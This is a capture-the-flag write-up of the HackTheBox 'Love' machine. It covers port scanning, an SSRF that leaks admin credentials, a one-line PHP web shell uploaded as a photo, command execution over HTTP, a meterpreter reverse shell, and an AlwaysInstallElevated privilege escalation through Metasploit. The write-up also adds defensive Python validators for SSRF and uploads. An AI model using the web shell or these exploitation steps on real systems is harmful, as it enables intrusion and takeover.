HackTheBox: Love Machine Solution
Haven’t done any HackTheBox in a while so I decided to jump back into it with an easy machine. Hope to have a medium solution posted in the near future. Love recently retired so let’s get into it :)
0x00 Recon
Starting off with some basic recon, we have a few open ports to look at:
Nmap scan report for 10.10.10.239
Host is up (0.016s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-18T14:00:16
| Not valid after: 2022-01-18T14:00:16
| MD5: bff0 1add 5048 afc8 b3cf 7140 6e68 5ff6
|_SHA-1: 83ed 29c4 70f6 4036 a6f4 2d4d 4cf6 18a2 e9e4 96c2
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| JavaRMI:
|_ Host '10.10.14.7' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Issuer: commonName=LOVE
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-11T14:39:19
| Not valid after: 2024-04-10T14:39:19
| MD5: d35a 2ba6 8ef4 7568 f99d d6f4 aaa2 03b5
|_SHA-1: 84ef d922 a70a 6d9d 82b8 5bb3 d04f 066b 12f8 6e73
|_ssl-date: 2021-07-31T21:10:28+00:00; +23m35s from scanner time.
| tls-alpn:
|_ http/1.1
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
The nmap scan revealed some domains to us, let’s add those to our /etc/hosts file so they’ll resolve:
- www.love.htb
- staging.love.htb
Wfuzz also revealed an /admin endpoint on the root domain:
Target: http://love.htb/FUZZ
Total requests: 4697
===================================================================
ID Response Lines Word Chars Payload
===================================================================
...SNIP...
000000511: 301 9 L 30 W 337 Ch "admin"
000002181: 200 125 L 324 W 4388 Ch "index.php"
000001696: 503 11 L 44 W 402 Ch "examples"
Furthermore, we have 3 separate web services running on this box:
- Admin panel on the root domain
- File scanner on the staging subdomain
- Unknown resource we cannot access on port 5000 (??)
Accessing the root domain we’re greeted with a login panel for which we don’t have the creds just yet.
After trying some basic SQLi auth bypass tricks on the root domain, I determined that wasn’t quite the path forward and decided to check out the staging subdomain.
This particular service was kind enough to provide us some functionality without needing any creds :). After exploring the /beta endpoint, the first thing that comes to mind is SSRF. Typically, any time a service will scan an external web resource on your behalf, SSRF is a risk and should be checked for.
I spent far too much time giving this thing URLs before remembering it’s common to bind to ALL interfaces 😉. Remember to keep things simple! Supplying http://localhost:5000/ vs http://10.10.10.239:5000/ gives far different results, and we end up retrieving some creds! admin:@LoveIsInTheAir!!!!
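The scanner on staging fetched http://localhost:5000/ for us because nothing checked where a submitted URL actually pointed. As an added example that is not part of the writeup or the voting app’s own code, here is the outbound-URL check, in Python rather than the app’s PHP, that would have refused it: only http(s) is accepted, and every address the host resolves to must be a public one. The name table is constructed so the demo runs offline; `dns_resolver` is the real lookup.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed name table so the demo runs offline; use dns_resolver for real lookups.
CONSTRUCTED_DNS = {"localhost": {"127.0.0.1"},
                   "staging.love.htb": {"10.10.10.239"},
                   "example.com": {"93.184.216.34"}}

def table_resolver(host):
    if host not in CONSTRUCTED_DNS:
        raise socket.gaierror(f"no constructed entry for {host}")
    return CONSTRUCTED_DNS[host]

def dns_resolver(host):
    # Every address the name maps to, IPv4 and IPv6; all of them must pass.
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_disallowed(ip):
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # treat ::ffff:127.0.0.1 the same as 127.0.0.1
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def is_safe_fetch_target(url, resolver=dns_resolver):
    """Return (ok, reason), judged by where the host resolves, not by how the string looks."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        addrs = {str(ipaddress.ip_address(host))}  # literal address, no lookup needed
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:
            return False, f"cannot resolve {host}"
    for addr in addrs:
        if is_disallowed(ipaddress.ip_address(addr)):
            return False, f"{host} maps to disallowed address {addr}"
    return True, "ok"

if __name__ == "__main__":
    for u in ("http://localhost:5000/", "http://10.10.10.239:5000/",
              "http://[::ffff:127.0.0.1]:5000/", "file:///C:/xampp/", "http://example.com/"):
        print(u, "->", is_safe_fetch_target(u, resolver=table_resolver))
```

Apply the same check to every hop of a redirect chain and connect to the address you validated rather than resolving the name again, otherwise a name that answers with a public address for the check and 127.0.0.1 for the fetch gets through.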
0x01 Admin Panel Access
The creds found above work on the admin panel located at http://love.htb/admin.
Admin of the voting system appears to be “Neovic Devierte”. Attempting to access the “print” functionality gives us a full path disclosure:
Warning: “continue” targeting switch is equivalent to “break”. Did you mean to use “continue 2”? in C:\xampp\htdocs\omrs\tcpdf\tcpdf.php on line 17778 TCPDF ERROR: Some data has already been output, can’t send PDF file
Knowing we have the SSRF from earlier, I decided to check out what’s in the tcpdf.php file. Nothing useful. I kept exploring around the admin dashboard, which led to discovering the photo upload functionality. Easily uploaded a custom php shell to: images/shell.php
Shell Src:
<?php $x = system($_GET['x']); ?>
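The photo upload accepted a file named shell.php into images/ and the web server ran it. As an added example that is not part of the writeup or the voting app’s own code, here is the server-side validation, in Python rather than the app’s PHP, that would have stopped it: the type is taken from the file content, the client’s extension must agree with it, and the stored name is random so nothing the client chose survives. The sample bytes and the directory advice in the comments are constructed assumptions.

```python
import secrets

# Accepted image types, identified by leading magic bytes rather than by the client's name.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXT_ALIASES = {"jpeg": "jpg"}
MAX_BYTES = 2 * 1024 * 1024

def detect_image_type(data):
    for ext, prefixes in MAGIC.items():
        if any(data.startswith(p) for p in prefixes):
            return ext
    return None

def validate_image_upload(client_name, data):
    """Return (ok, reason, stored_name). stored_name is random hex plus the
    detected extension, so shell.php or shell.php.png never becomes a file the
    web server could hand to a script handler."""
    if len(data) > MAX_BYTES:
        return False, "file too large", None
    detected = detect_image_type(data)
    if detected is None:
        return False, "content is not a supported image", None
    claimed = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    claimed = EXT_ALIASES.get(claimed, claimed)
    if claimed != detected:
        return False, f"extension .{claimed} does not match content ({detected})", None
    # Write the bytes under this name in a directory outside the web root (assumption:
    # served back through a handler that sets Content-Type from `detected`).
    return True, "ok", f"{secrets.token_hex(16)}.{detected}"

if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32      # constructed PNG header plus padding
    for name, blob in (("shell.php", b"<?php echo 1; ?>"), ("shell.php", png),
                       ("shell.php.png", png), ("photo.png", png)):
        print(name, "->", validate_image_upload(name, blob))
```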
0x02 Foothold
Our basic php shell lets us execute system commands, let’s find out who we are!
GET /images/shell.php?x=whoami HTTP/1.1
Host: www.love.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://www.love.htb/admin/voters.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=hfi9rkokgavfkglrb7doti96ef
Connection: close
HTTP/1.1 200 OK
Date: Sat, 31 Jul 2021 21:50:11 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 13
Connection: close
Content-Type: text/html; charset=UTF-8
love\phoebe
I decided I hated executing commands via HTTP, so I threw a quick meterpreter payload (abusing the same upload functionality) and spawned a real reverse shell.
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows LOVE\Phoebe @ LOVE 10.10.14.7:4444 -> 10.10.10.239:54399 (10.10.10.239)
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
0x03 Flags
User
Grabbing user was as simple as reading user.txt from the Desktop.
user.txt : 44412c39d7d79abf83eff963d7500e83
Root
Uploading the WinPEAS enum script (think LinEnum for Windows) and running it on the target revealed some interesting things. The one that stood out the most, and something I was unaware of when it comes to Windows exploitation, is the AlwaysInstallElevated registry key:
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
Metasploit makes quick work of this configuration oversight:
use exploit/windows/local/always_install_elevated
Pass it the unprivileged meterpreter session and voilà!